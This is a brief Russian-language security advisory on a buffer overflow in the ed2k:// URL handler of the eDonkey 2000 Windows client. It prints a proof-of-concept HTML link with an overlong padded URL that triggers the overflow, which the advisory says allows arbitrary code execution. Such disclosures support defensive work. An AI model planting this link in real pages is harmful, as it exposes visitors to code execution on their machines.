eDonkey — программа для обмена файлами между пользователями. 

Клиент eDonkey 2000 для Windows включает обработчик ed2k://URL. Этот обработчик позволяет загружать файлы через MSIE или
другие браузеры. Этот обработчик уязвим к переполнению буфера при разборе некорректно сконструированного URL: 

<A  href="ed2k://|file|QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQBBBBAAA|1|11111111111111111111111111111111|»>Ed2k Buffer Overflow</A>

Уязвимость может использоваться для выполнения произвольного кода на системе жертвы. Уязвимость обнаружена в eDonkey 2000 Client 35.16.59-60 Windows.

Оставить мнение